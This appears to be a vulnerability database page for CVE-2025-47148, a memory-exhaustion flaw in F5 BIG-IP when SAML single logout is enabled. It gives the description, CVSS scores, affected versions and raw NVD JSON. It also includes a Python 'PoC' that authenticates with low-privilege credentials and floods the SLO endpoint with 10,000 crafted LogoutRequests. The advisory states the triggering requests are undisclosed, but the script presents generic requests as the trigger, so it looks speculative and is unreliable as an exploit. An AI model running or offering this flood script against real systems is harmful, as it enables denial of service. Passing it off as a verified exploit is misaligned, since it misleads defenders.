Security Vulnerability Report
CVE-2025-47148 CVSS 6.5 MEDIUM

CVE-2025-47148

Published: 2025-10-15 14:15:48
Last Modified: 2025-10-21 18:53:55

Description

When the BIG-IP system is configured as both a Security Assertion Markup Language (SAML) service provider (SP) and Identity Provider (IdP), with single logout (SLO) enabled on an access policy, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

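cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* (from 15.1.0, before 15.1.10.8) - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* (from 16.1.0, before 16.1.6.1) - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* (from 17.1.0, before 17.1.3) - VULNERABLE
cpe:2.3:a:f5:big-ip_access_policy_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:* (from 15.1.0, before 15.1.10.8) - VULNERABLE
cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:* (from 16.1.0, before 16.1.6.1) - VULNERABLE
cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:* (from 17.1.0, before 17.1.3) - VULNERABLE
cpe:2.3:a:f5:big-ip_ssl_orchestrator:17.5.0:*:*:*:*:*:*:* - VULNERABLE
F5 BIG-IP (for the specific affected versions, see F5 security advisory K000148816)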

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-47148 PoC - F5 BIG-IP SAML SLO Memory Exhaustion
# This PoC demonstrates how to trigger memory resource exhaustion
# by sending crafted SAML Single Logout (SLO) requests to a vulnerable
# BIG-IP system configured as both SAML SP and IdP.

import requests
import base64
import time
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target BIG-IP system configuration
TARGET_URL = "https://bigip-target.example.com"
SAML_SLO_ENDPOINT = "/saml/sp/slo"  # SAML SLO endpoint
USERNAME = "attacker_user"  # Low-privilege authenticated user
PASSWORD = "attacker_password"


def create_malicious_slo_request(session_id):
    """
    Create a malformed SAML LogoutRequest that triggers memory leak.
    The request contains undisclosed parameters that cause BIG-IP to
    allocate memory without proper cleanup.
    """
    # Craft SAML LogoutRequest XML with malicious attributes
    logout_request = f"""<?xml version="1.0" encoding="UTF-8"?>
<samlp:LogoutRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                     xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                     ID="_{session_id}"
                     Version="2.0"
                     IssueInstant="{time.strftime('%Y-%m-%dT%H:%M:%SZ')}"
                     Destination="{TARGET_URL}{SAML_SLO_ENDPOINT}">
    <saml:Issuer>malicious_sp</saml:Issuer>
    <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">
        [email protected]
    </saml:NameID>
    <samlp:SessionIndex>{session_id}</samlp:SessionIndex>
</samlp:LogoutRequest>"""

    # Base64 encode the SAML request
    encoded_request = base64.b64encode(logout_request.encode('utf-8')).decode('utf-8')
    return encoded_request


def authenticate_and_get_session():
    """
    Authenticate to BIG-IP with low-privilege credentials to obtain session.
    Required because the vulnerability needs PR:L (Low privileges).
    """
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/mgmt/shared/authn/login",
                            json=login_data, verify=False)
    if response.status_code == 200:
        print(f"[+] Authenticated successfully")
        return session
    else:
        print(f"[-] Authentication failed: {response.status_code}")
        return None


def exploit_memory_exhaustion(session):
    """
    Send repeated malicious SLO requests to exhaust memory resources.
    Each request causes memory allocation without proper cleanup.
    """
    print("[*] Starting memory exhaustion attack...")
    count = 0
    for i in range(10000):  # Send many requests
        session_id = f"malicious_session_{i}_{int(time.time())}"
        encoded_slo = create_malicious_slo_request(session_id)

        # Send the malicious SLO request
        params = {
            "SAMLRequest": encoded_slo,
            "RelayState": "malicious_relay_state"
        }
        try:
            response = session.post(
                f"{TARGET_URL}{SAML_SLO_ENDPOINT}",
                params=params,
                verify=False,
                timeout=10
            )
            count += 1
            if count % 100 == 0:
                print(f"[*] Sent {count} malicious SLO requests...")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed (possible service degradation): {e}")
            break
    print(f"[+] Attack complete. Sent {count} requests total.")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-47148 - F5 BIG-IP SAML SLO Memory Exhaustion PoC")
    print("=" * 60)

    # Step 1: Authenticate with low-privilege credentials
    session = authenticate_and_get_session()
    if session:
        # Step 2: Exploit the vulnerability
        exploit_memory_exhaustion(session)

References

https://my.f5.com/manage/s/article/K000148816 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47148", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:47.637", "lastModified": "2025-10-21T18:53:54.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the BIG-IP system is configured as both a Security Assertion Markup Language (SAML) service provider (SP) and Identity Provider (IdP), with single logout (SLO) enabled on an access policy, undisclosed requests can cause an increase in memory resource utilization.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.1.0", "versionEndExcluding": "16.1.6.1", "matchCriteriaId": "6494E2A7-1473-46C0-97F8-90827D9466AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "96D35435-27A7-4A88-9432-1F5AB0112B8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:17.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "369D38E2-62B5-47C4-B606-7A2DD866133C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "40B87228-F144-41C7-ACD8-1168CC5C57F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "16.1.0", "versionEndExcluding": "16.1.6.1", "matchCriteriaId": "7829108D-71A4-4F91-81F6-804E9EB1AE9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "581B1484-C457-4C11-B43A-DCF49EBC07DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:17.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "29BF7E7D-7E43-4937-9F68-3F9448590D72"}]}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000148816", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}